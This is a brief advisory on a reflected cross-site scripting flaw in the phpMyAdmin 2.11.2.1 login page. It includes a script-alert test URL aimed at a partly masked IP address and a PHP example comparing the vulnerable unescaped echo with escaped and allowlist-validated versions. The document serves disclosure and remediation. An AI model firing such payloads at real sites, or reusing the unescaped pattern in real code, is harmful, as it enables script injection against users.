phpMyAdmin 2.11.2.1 Login Page Cross-Site Scripting

  $ grep -n convcharset libraries/auth/cookie.auth.lib.php
  48: * @uses    $GLOBALS['convcharset']
  236: <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />

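All input is harmful. Line 236 echoes $GLOBALS['convcharset'] into the value attribute of the hidden field without HTML-escaping it.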
Test:

  http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>
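
The unescaped echo from line 236 next to an output-encoded and an allowlist-validated version, as an added example that is not phpMyAdmin's code or its actual fix. The function names, the ALLOWED_CHARSETS list and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not phpMyAdmin's code. Function names and the charset
// allowlist are assumptions made for illustration.

// Charset names the application is willing to accept (assumed list).
const ALLOWED_CHARSETS = ['utf-8', 'iso-8859-1', 'iso-8859-2', 'windows-1251'];

// Pattern from line 236: the request value goes into the attribute as-is.
function hidden_field_unescaped(string $value): string
{
    return '<input type="hidden" name="convcharset" value="' . $value . '" />';
}

// Output encoding: quotes and angle brackets become entities, so the value
// stays inside the attribute.
function hidden_field_escaped(string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="convcharset" value="' . $safe . '" />';
}

// Input validation: only known charset names pass, anything else is replaced
// by the default.
function normalize_charset($value, string $default = 'utf-8'): string
{
    if (!is_string($value)) {   // ?convcharset[]=x arrives as an array
        return $default;
    }
    $value = strtolower(trim($value));
    return in_array($value, ALLOWED_CHARSETS, true) ? $value : $default;
}

// Constructed sample inputs: a valid charset, the test value from the post,
// a value containing a double quote, and a non-string value.
$samples = ['utf-8', '<script>alert(6code)</script>', 'utf-8" title="x', ['nested']];
foreach ($samples as $raw) {
    echo 'input:     ' . (is_string($raw) ? $raw : '(array)') . "\n";
    if (is_string($raw)) {
        echo 'unescaped: ' . hidden_field_unescaped($raw) . "\n";
        echo 'escaped:   ' . hidden_field_escaped($raw) . "\n";
    }
    echo 'validated: ' . hidden_field_escaped(normalize_charset($raw)) . "\n\n";
}
```

Validation and encoding are applied together here: the allowlist rejects unexpected values at input, and htmlspecialchars() still encodes whatever reaches the template.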
